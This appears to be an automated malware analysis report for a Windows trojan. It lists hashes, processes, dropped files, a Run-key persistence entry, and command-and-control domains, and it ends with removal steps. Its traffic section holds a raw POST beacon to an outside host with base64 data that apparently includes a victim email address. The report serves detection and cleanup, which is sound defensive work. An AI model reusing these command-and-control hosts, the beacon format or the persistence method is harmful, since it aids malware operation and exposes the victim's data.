Gen.Variant.Kazy.604861_000a8fff3d

by malwarelabrobot on June 27th, 2015 in Malware Descriptions.

Trojan.Win32.Scar.jbjc (Kaspersky), Gen:Variant.Kazy.604861 (B) (Emsisoft), Gen:Variant.Kazy.604861 (AdAware)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 000a8fff3dc7e5ee339acd7651e61389
SHA1: 8ea3631a532f4a2f8175e4604790d5b2cc4bf20f
SHA256: fd34939bdd9cf5ea9a89ae28668b13da840154eb427cff950a0ffa5f063ac55c
SSDeep: 6144:X1p9JPd0OmBRGezfbsNCuqkBPZxo4Wx2Pqe:H9JP d6ezfbsNCTihxzWpe
Size: 272384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-04-29 21:56:08
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process %original file name%.exe:344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)

The process qfjlkyhjspng.exe:4348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

The process edxqdqrjinn.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)

The process edxqdqrjinn.exe:5332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

Registry activity

The process %original file name%.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 33 C3 FC F0 18 9E 4B 26 B1 8D 41 D4 D2 26 8D"

The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE A2 A6 D5 FE B6 E5 FA 9F F6 DB 69 C5 B8 34 1D"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"

The process edxqdqrjinn.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 15 81 A8 A9 CA 88 35 6F 21 06 0F A0 CF 22 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 197786 198144 4.59472 d3db33cbe1e67b5fc50d77d3ab9d3dd0
.rdata 204800 51540 51712 4.29268 e689de08fdfceeb94d7941142e8ddfbc
.data 258048 18780 7168 2.96275 b56ddf3be60a92d054c9f7de7e054bb4
.reloc 278528 14112 14336 4.68663 b05f0be3485a2f936c5109f90eeec610

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://machineanimal.net/index.php 72.52.4.91
hxxp://machineproblem.net/index.php 184.168.221.34
hxxp://figureproblem.net/index.php 98.139.135.198


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Zeus GameOver Possible DGA NXDOMAIN Responses

Traffic

GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: machineproblem.net


HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /index.php


POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: figureproblem.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 197

post=aG9jaHJlaW5qQGNpdGlmaW5hbmNpYWwuY29tCWhnc3l3bGR6agllZHhxZHFyamlubi5leGUJcWZqbGt5aGpzcG5nLmV4ZQlUcmFwIENyZWRlbnRpYWwgRmlsdGVyaW5nIEt0bVJtCVBhbmVsIFJlcG9ydHMgVGFibGV0IFRyYW5zYWN0aW9uCTAwNQ==
HTTP/1.0 200 OK
Date: Fri, 26 Jun 2015 15:08:45 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1

<<< skipped >>>

GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: figureproblem.net


HTTP/1.0 200 OK
Date: Fri, 26 Jun 2015 15:08:44 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1

<<< skipped >>>

The Trojan connects to the servers at the following location(s):



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:344
    qfjlkyhjspng.exe:4348
    ewrrwkxzfemuscomjih.exe:2564
    edxqdqrjinn.exe:3580
    edxqdqrjinn.exe:5332

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
    C:\hgsywldzj\icmjbyxsy1 (12 bytes)
    C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
    C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
    C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
    C:\hgsywldzj\qnglq0unrq (84 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
